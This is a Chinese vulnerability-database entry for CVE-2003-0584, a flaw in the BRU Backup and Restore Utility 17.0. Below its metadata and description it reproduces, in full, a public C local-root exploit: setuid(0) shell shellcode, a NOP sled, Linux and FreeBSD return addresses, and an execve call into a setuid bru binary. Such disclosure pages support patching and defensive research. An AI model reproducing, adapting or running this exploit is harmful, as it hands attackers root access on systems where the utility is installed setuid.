Unix (BRU)格式字符串漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1107416 漏洞类型 格式化字符串
发布时间 2003-07-16 更新时间 2003-08-18
CVE编号 CVE-2003-0584 CNNVD-ID CNNVD-200308-099
漏洞平台 Unix CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/22923
https://www.securityfocus.com/bid/82751
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200308-099
|漏洞详情
Unix(BRU)17.0版本及之前版本的Backup和RestoreUtility在运行setuid时存在格式字符串漏洞。本地用户可以借助命令行参数中的格式字符串说明符执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/8215/info

It has been reported that BRU may not properly parse commandline arguments, potentially leading to at least two vectors of exploitation. It may be possible for local attackers to conduct format string-based attacks as well as buffer overflow-based attacks.

It should be noted that although BRU does not ship with the suid bit set by default, documentation within the software may instruct users to enable it.

/** EST BRU(TM) Backup and Restore Utility Local Root Exploit
 **
 ** By: Dvdman@l33tsecurity.com
 **
 ** Simple Stack overflow Wont say any more :P
 **
 ** Linux & FreeBsd Targets
 **
 ** Greetz: sam,flatline,v0id,#!l33tsecurity@efnet,KF,b0iler,schlumpf,kokanin,DSR
 **
 ** Public Release
 ** L33tsecurity 2003; irc.secsup.org #l33tsecurity
 **/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/errno.h>

#define FUN "./bru"

char shellcode[] =
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"

    /* SETUID(0) SHELLCODE LINUX */
    "\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc\xfc"
    "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f"
    "\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x8d\x54\x24\x08\x50\x53\x8d"
    "\x0c\x24\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80";

unsigned long sp(void) {
           __asm__("movl %esp,%eax");
}

int main(int argc, char **argv) {

    char buffer[9000];
    int x,target;  
    char    *env[2];
    char    *args[24];

    unsigned long ret = 0xbffffffa - strlen(shellcode) - strlen(FUN); 

    int *ptr = (int *)(buffer);
    if (argc != 2) {
       usage();
       exit(0);
       }
        
    target = atoi(argv[1]);

   if (target == 0) {
    for (x=0; x<9000 ; x+=4)
      *ptr++ = (ret + 1);
   }

   if (target == 1) {
     for (x=0; x<3500 ; x+=4)
          *ptr++ = 0xbfbffe48;
   }
    
    /* put in env */  
    env[0] = shellcode;     
    env[1] = NULL;


    args[0] = FUN;
    args[1] = buffer;
    args[2] = NULL;


    execve (args[0], args, env);
    perror ("execve");        
}       


int usage() {
printf("EST BRU(TM)local root exploit\n");
printf("By: Dvdman@l33tsecurity.com\n");
printf("Usage: ./ex_bru target\n");
printf("TARGET LIST:\n");
printf("0. LINUX\n1. FREEBSD\n");
return 0;
}
|受影响的产品
Tolis Group BRU 17.0
|参考资料

来源:BUGTRAQ
名称:20030716SRT2003-07-16-0358-bruhasbufferoverflowandformatissues
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=105846288808846&w=2